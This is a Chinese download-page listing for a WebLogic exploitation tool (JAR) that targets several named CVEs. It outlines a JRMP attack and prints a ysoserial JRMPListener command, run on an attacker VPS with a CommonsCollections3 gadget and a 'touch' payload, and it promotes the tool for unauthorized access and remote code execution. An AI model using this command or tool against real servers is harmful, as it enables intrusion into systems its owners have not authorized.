1. 首页
  2. 安全技术
  3. 网络安全
  4. WebLogic漏洞利用工具最新版本

WebLogic漏洞利用工具最新版本

上传者: 2023-11-24 20:35:25上传 JAR文件 130.8MB 热度 80次

漏洞利用工具针对WebLogic的最新漏洞进行了升级,支持的漏洞包括CVE-2023-21931(JNDI)、CVE-2023-21839(JNDI)、CVE-2020-2551(JRMP)等多个漏洞。其中,JRMP类型的漏洞攻击需要使用特定的模块,可以在VPS上通过yso启动JRMP,然后在工具中填入VPS的JRMP地址。具体的攻击命令如下:java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 'touch /tmp/1.txt'。该工具版本要求使用JDK 8,并可用于执行未授权访问、远程代码执行等攻击。用户可以根据需要选择合适的漏洞进行利用,提高渗透测试和安全评估的效果。

下载地址
用户评论
码姐姐匿名网友 2025-01-11 06:52:18

挺好用的这个工具